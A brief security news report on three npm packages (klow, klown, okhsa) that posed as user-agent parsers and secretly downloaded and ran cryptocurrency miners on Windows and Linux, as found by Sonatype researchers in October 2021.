Cryptocurrency miner detected in three npm packages

Cryptocurrency miner detected three npm packages

Sonatype specialists found another piece of malware in the JavaScript package manager npm (Node Package Manager). This time, three libraries at once contained a hidden cryptocurrency miner.

All three malicious packages ( klow ,  klown  and  okhsa ) were disguised as user-agent string parsers. However, after downloading, having determined which operating system the victim is working with, they launched the BAT or Shell crypt (depending on the victim’s platform).

“Then these scripts loaded an EXE or Linux ELF hosted on an external server and executed a binary with arguments indicating the mining pool, cryptocurrency wallet and the number of CPU threads used,” Sonatype experts write.

Final payloads (miners) could work both in  Windows and  Linux.

Fortunately, all three packages were active for only one day, October 15, 2021, and none of them received more than 150 downloads. Interestingly, all three malicious libraries were downloaded from the same account, that is, they were created by one person.

Catch up on more stories here

Follow us on Facebook here

Leave a Reply